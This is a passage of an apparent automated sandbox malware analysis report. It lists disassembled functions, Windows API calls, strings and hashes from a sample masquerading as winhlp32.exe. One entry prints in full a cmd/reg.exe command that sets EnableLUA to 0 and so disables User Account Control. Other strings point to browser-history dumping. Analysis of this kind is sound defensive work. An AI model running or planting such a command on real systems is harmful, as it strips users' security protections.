                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Windows\winhlp32.exe
                                    • API String ID: 0-1895770939
                                    • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                    • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                    • SetEvent.KERNEL32(?), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                    • CloseHandle.KERNEL32(?), ref: 00405140
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                    • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                    • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 004493BD
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID:
                                    • API String ID: 1286116820-0
                                    • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                    • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                    • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                    • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                    • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                    • _free.LIBCMT ref: 0044F3BF
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                    • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 1852769593-0
                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                    • _free.LIBCMT ref: 004482D3
                                    • _free.LIBCMT ref: 004482FA
                                    • SetLastError.KERNEL32(00000000), ref: 00448307
                                    • SetLastError.KERNEL32(00000000), ref: 00448310
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                    • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004509D4
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 004509E6
                                    • _free.LIBCMT ref: 004509F8
                                    • _free.LIBCMT ref: 00450A0A
                                    • _free.LIBCMT ref: 00450A1C
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00444066
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00444078
                                    • _free.LIBCMT ref: 0044408B
                                    • _free.LIBCMT ref: 0044409C
                                    • _free.LIBCMT ref: 004440AD
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                    • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strpbrk.LIBCMT ref: 0044E738
                                    • _free.LIBCMT ref: 0044E855
                                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                    • Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: `#D$`#D
                                    • API String ID: 885266447-2450397995
                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 00443475
                                    • _free.LIBCMT ref: 00443540
                                    • _free.LIBCMT ref: 0044354A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\winhlp32.exe
                                    • API String ID: 2506810119-3669941681
                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                    • GetLastError.KERNEL32 ref: 0044B931
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                    • String ID: PkGNG
                                    • API String ID: 2456169464-263838557
                                    • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                    • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                    • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                    • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                    • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 004162F5
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
